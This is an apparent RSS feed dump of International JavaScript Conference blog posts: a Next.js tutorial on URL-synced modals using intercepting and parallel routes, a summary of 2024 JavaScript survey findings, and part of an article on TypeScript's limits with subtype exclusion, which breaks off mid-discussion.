Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but add unnecessary complexity for something as simple as opening or closing a modal

2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1.URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2.Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.

iJS Newsletter

Keep up with JavaScript’s latest news!

Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
  • app 
    ├── @modal 
    ├── (.)feedback 
    │   │   └── page.tsx 
    │   └── default.tsx 
    ├── feedback 
    │   └── page.tsx  
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.

iJS Newsletter

Keep up with JavaScript’s latest news!

Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.

ARIA attributes

Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role=”dialog” to the modal container to define it as a dialog window.
  • Use aria-modal=”true” to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle Refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([…catchAll]) in the @modal slot ensures this:

export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>

Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

Feature Client-side modals URL-synced modals in Next.js
Deep Linking Not supported. Users can’t share or bookmark the modal state. Fully supported. Modal states are linked to specific URLs.
Refresh Behaviour When the page is refreshed, the modal state is reset and closed. The modal state persists across refreshes.
Navigation Consistency Backwards or forward navigation cannot close or reopen the modal. Modals respect browser navigation, closing or reopening correctly.
Scalability State management for complex modals can be difficult in large applications. Simplified state management using URL routes.
SEO and Accessibility Modals are not indexed or accessible via URLs. Can be indexed and shared where appropriate.

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.

Shopping Cart and Side Panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking “Login” could open a modal linked to “/login.” When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and Wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.

iJS Newsletter

Keep up with JavaScript’s latest news!

TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontends frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, transitioning from being just a library to evolving into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React. 

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)

iJS Newsletter

Keep up with JavaScript’s latest news!

Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents complaining about having issues with it. Common issues related to frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. The growing use of TypeScript will solidify as a standard for large-scale applications due to its type safety and improved developer tooling. We’ll also see the rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
TypeScript’s Limitations and Workarounds https://javascript-conference.com/blog/typescript-limitations-workarounds/ Mon, 16 Dec 2024 14:20:26 +0000 https://javascript-conference.com/?p=107028 TypeScript, while a powerful programming language, has limitations that arise from its type system's attempt to manage dynamically typed JavaScript code. From handling return types and function expressions to the behavior of else statements, developers often encounter challenges when working with TypeScript files. Issues can emerge at compile time, especially when using generic functions, creating an instance, or managing type information. This article explores the blind spots in TypeScript, such as handling function objects, top-level constructs, and dynamically typed scenarios, offering insights into workarounds and practical solutions.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
TypeScript’s type system effectively manages much of JavaScript’s dynamism in useful ways, rather than eliminating it. Developers writing TypeScript code can use almost the full range of web technologies in a type-safe manner. However, when issues arise, they’re often the result of the developer’s choices, not the tools themselves.

Most developers follow well-established patterns in their day-to-day programming. Modern frameworks and tools provide solid structures to guide us, offering solutions and guidelines for nearly every question. However, the complexity and long history of the modern web platform ensure that surprises still occur and new, sometimes unsolvable, challenges continue to emerge.

This issue extends beyond people to include their tools and machines. No one can do everything, and certainly, not every tool is suited to every task. TypeScript is no exception: while it can accurately describe 99% of JavaScript features, one percent remains beyond its grasp. This gap doesn’t only consist of reprehensible anti-features. Some JavaScript features that TypeScript doesn’t fully understand can still be useful. Additionally, for some other features, TypeScript operates under assumptions that can’t always align with reality.

Like any tool, TypeScript isn’t perfect; and we should be aware of its blind spots. This article addresses three of these blind spots, offers possible workarounds, and explores the implications of encountering them in our code.

Blind Spot 1: Excluding subtypes in type parameters

The Liskov substitution principle requires that a program can handle subtypes of T wherever a type T is expected. The classic example of object orientation still serves as the best illustration of this principle (Listing 1).

Listing 1: The classic OOP example with animals

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

class Collie extends Dog {
  hair = "long";
}

let myDog: Dog = new Collie("Lassie");
// Works!

It makes perfect sense that a Collie instance is assigned to a variable of type Dog, because a Collie is a dog with long hair. The object that ends up in the myDog variable provides all the functions required by the Dog type annotation. The fact that the object can do more (for example, show off long hair) is irrelevant in this context. But what if that additional feature does matter?

Thanks to structural subtyping, TypeScript allows any object that fulfills a given API contract (or implements a given interface) to be treated as a “subtype” (Listing 2).

Listing 2: Structural subtyping in Action

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

type Cat = { name: string };

let myPet: Cat = new Dog("Lassie");
// Works!

In web development, where developers don’t have to manually create every object from a class constructor, this rule is very pragmatic. On one hand, it results in relatively minor semantic errors (Listing 3), but on the other, it can also lead to more significant pitfalls.

Listing 3: Structural subtyping triggers an error

type RGB = [number, number, number];
let green: RGB = [0, 100, 0];

type HSL = [number, number, number];
let red: HSL = [0, 100, 50];

red = green;
// Works! RGB and HSL have the same structure_
// But is that OK at runtime?_

Let’s look at a function that accepts a parameter of type WeakSet< any >:

function takesWeakSet(m: WeakSet<any>) {}

In JavaScript, weak sets are sets with special garbage collection features. They only hold weak references to their contents and can’t cause memory leaks. However, unlike normal sets, weak sets lack many features, mainly all iteration mechanisms. While normal sets can function as universal lists as well as sets, weak sets can only tell us whether they contain a given value, something normal sets can do too. This means that the WeakSet API is a subset of the Set API, meaning that Set is a subtype of WeakSet (Listing 4).

Listing 4: WeakSets and Sets as subtypes

function takesWeakSet(m: WeakSet<any>) {}

// Works obviously
takesWeakSet(new WeakSet());

// Works too, Set is a subtype of WeakSet
takesWeakSet(new Set());

// But is that OK at runtime?

Depending on the function’s intent, this can either be a non-issue (as with Dog and Collie), an easily identifiable problem (as with RGB and HSL), or it can lead to subtle, undesired behavior in our program. When takesWeakSet() expects to receive a true WeakSet, it might store new values in the set and assume that it doesn’t need to worry about removing them later. After all, weak sets automatically prevent memory leaks. However, this assumption can be undermined if Set is considered a subtype of WeakSet.

So, while it’s often safe to accept subtypes of a given type, it’s not always so straightforward. In this case, the implementation is relatively simple, but it’s not possible to generalize this approach.

iJS Newsletter

Keep up with JavaScript’s latest news!

Unfortunately, subtypes have to stay out

With type-level programming, it’s comparatively easy to construct a type that accepts another type but rejects its subtypes. The key tool for this is generic types, which we can consider to be type functions (Listing 5).

Listing 5: Generic Types as Type Functions

// Type function that wraps the parameter T
// in an array
type Wrap<T> = [T];

// Corresponding JS function that
// wraps the parameter t in an array
let wrap = (t) => [t];

In generic types, we can use conditional types, which work just like the ternary operator in JavaScript (Listing 6).

Listing 6: Conditional Types

// A extends B = “is A a subtype of B?”
// In other words: “is A a subtype of B?”
type Test<T> = T extends number? true : false;

type A = Test<42>; // true (42 is assignable to number)
type B = Test<[]>; _// false ([] is not assignable to number)

Equipped with this knowledge, we can now formulate a type function that accepts two type parameters and determines whether the first parameter exactly matches the type of the second parameter. This is true only if the first parameter is assignable to the second and the second parameter is assignable to the first. If either of these conditions doesn’t apply, then either the first parameter must be a subtype of the second, the second must be a subtype of the first, or both parameters must be completely incompatible. In code, this is illustrated in Listing 7.

Listing 7: ExactType<Type, Base>

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

type A = ExactType<WeakSet<any>, WeakSet<any>>;
// Result: WeakSet<any> - A and B are the same

type B = ExactType<Set<any>, WeakSet<any>>;
// Result: never - A is a subtype of B

type C = ExactType<WeakSet<any>, Set<any>>;
// Result: never - B is a subtype of A

type D = ExactType<WeakSet<any>, string>;
// Result never - A and B are incompatible

The type never, used here to model the case where the type and base are different, is a type to which no value can be assigned. Each data type represents a set of possible values (e.g., number is the set of all numbers and Array< string > is the set of all arrays filled with strings), while never represents an empty set. No error, no exception: never simply stands for nothing.

We can now use ExactType<Type, Base> to modify takesWeakSet() so that it only accepts weak sets. We just have to make the function generic and then define the type for the value parameter m with ExactType (Listing 8).

Listing 8: ExactType<Type, Base> in action

type ExactType<Type, Base> =
  Type extends Base
    ? Base extends Type
      ? Type
      : never
    : never;

function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

// Works obviously
takesWeakSet(new WeakSet());

// No longer works!
takesWeakSet(new Set());

The reason why the call with the normal set does not work is that ExactType<Type, Base> computes the type never as a result here, and since no value (and certainly no set object) fits into never, the TypeScript compiler complains at this point as desired. Problem solved?

The difficult subtype exclusion in type parameters

If we can treat generic types like functions, as we suggested earlier, then it should be possible to reproduce the features of the runtime function takesWeakSet() as a type function. As it stands now, the function only accepts a parameter that is restricted to an exact subtype, so it should be possible. The skeleton, a generic type with a type parameter, is easy to set up:

type TakesWeakSet<M> = {}; 

Since any arbitrary data type can be used here, we need a type for the type T. Fortunately, this isn’t a problem, as extends clauses can be used both in conditional types and as restrictions for type parameters:

type TakesWeakSet<M extends WeakSet<any>> = {}; 

This puts the type function in the same state that takesWeakSet() was in initially: it’s a single-argument function with a type annotation that specifies a minimal requirement for the input. Subtypes are still accepted (Listing 9).

Listing 9: Subtypes as Input

type TakesWeakSet<M extends WeakSet<any>> = {};

// Obviously works
type A = TakesWeakSet<WeakSet<any>>;

// Also works, Set is a subtype of WeakSet
type B = TakesWeakSet<Set<any>>;

That’s not a problem, as that’s exactly why we wrote ExactType. However, there is a fundamental difference between the type function TakesWeakSet<M> and the runtime function takesWeakSet(m). The latter, if we look closely, has one more parameter than the former (Listing 10).

Listing 10: Type and runtime function in comparison

// One parameter “M”
type TakesWeakSet<M extends WeakSet<any>> = {};

// One parameter “m” AND one type parameter T
function takesWeakSet<T>(m: ExactType<T, WeakSet<any>>) {}

A call to the runtime function takesWeakSet() passes two parameters: a type parameter and a value parameter. The type parameter is used to calculate the type of the value parameter, where an error occurs if ExactType returns never. The type function ExactType is key to excluding subtypes. This trick can’t be reproduced at the type level because self-referential type parameters aren’t allowed, except in a few special cases that aren’t relevant here (Listing 11).

Listing 11: No self-referential constraints in type parameters

// Error: “Type” cannot be input for
// its own constraints
type TakesExact<Type extends ExactType<
  Type,
  WeakSet<any>>
> = {};

What would work, however, is to move the logic from ExactType to TakesExact. This wouldn’t reject subtypes, but would instead translate them to never, resulting in no error, just a likely unhelpful result (Listing 12).

Listing 12: TakesExact with the logic of ExactType

type TakesExact<Type> = Type extends WeakSet<any>
  ? WeakSet<any> extends Type
    ? Type
    : never
  : never;

type R1 = TakesExact<WeakSet<{}>>;
// OK, R1 = WeakSet<{}>

type R2 = TakesExact<Set<string>>;
// OK, R2 = never (NO error)

type R3 = TakesExact<Array<string>>;
// OK, R3 = never (NO error)
 

Regardless of how you approach it, rejecting parameters that are subtypes of a given type or enforcing an exact type at the type level isn’t possible. TypeScript has a blind spot here. But is this truly a problem?

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

How do we deal with subtype constraints at the type level?

The golden rule of programming in statically typed languages is: “Make invalid states unrepresentable.” If developers can write code in such a way that it prevents the program from taking wrong paths (e.g., by using exact type annotations to eliminate invalid inputs), they can save a lot of time debugging unwanted states. In principle, this rule is invaluable and should be followed whenever possible. However, it isn’t always feasible in the unpredictable world of JavaScript and TypeScript development.

To summarize, our goal was to create a program where a variable of type T can only be assigned values of type T and not any of its subtypes. We’ve succeeded in doing this in the runtime code, but we’ve failed at the type programming level. However, according to the Liskov substitution principle, this restriction may be unnecessary. After all, a subtype of T inherently has all the functions of T– so why do we need the restriction in the first place?

In our case, the key factor is that a Set and a WeakSet have very different semantics, even though the WeakSet API is a subset of the API of Set. In TypeScript’s type system, this means that Set is evaluated as a subtype of WeakSet, leading to the assumption of a relationship and substitutability where none exists. This blind spot in the type system leads us to solve a problem that isn’t actually a problem at all, and which we ultimately can’t resolve, especially at the type level.

Instead, we have to accept that the TypeScript type system doesn’t correctly model every detail of JavaScript objects and their relationships. Structural subtyping is a very pragmatic approach for a type system that attempts to describe JavaScript, but it’s not particularly selective. If we find ourselves in a situation where we want to ban subtypes from certain program parts despite TypeScript’s resistance, we should ask ourselves two questions:

  1. Do we really need to exclude subtypes, or would the program work with subtypes? Can we rewrite the program to work with subtypes like any other program?
  2. Are we trying to exclude subtypes to compensate for blind spots in the TypeScript type system (as in the Set/WeakSet example)?

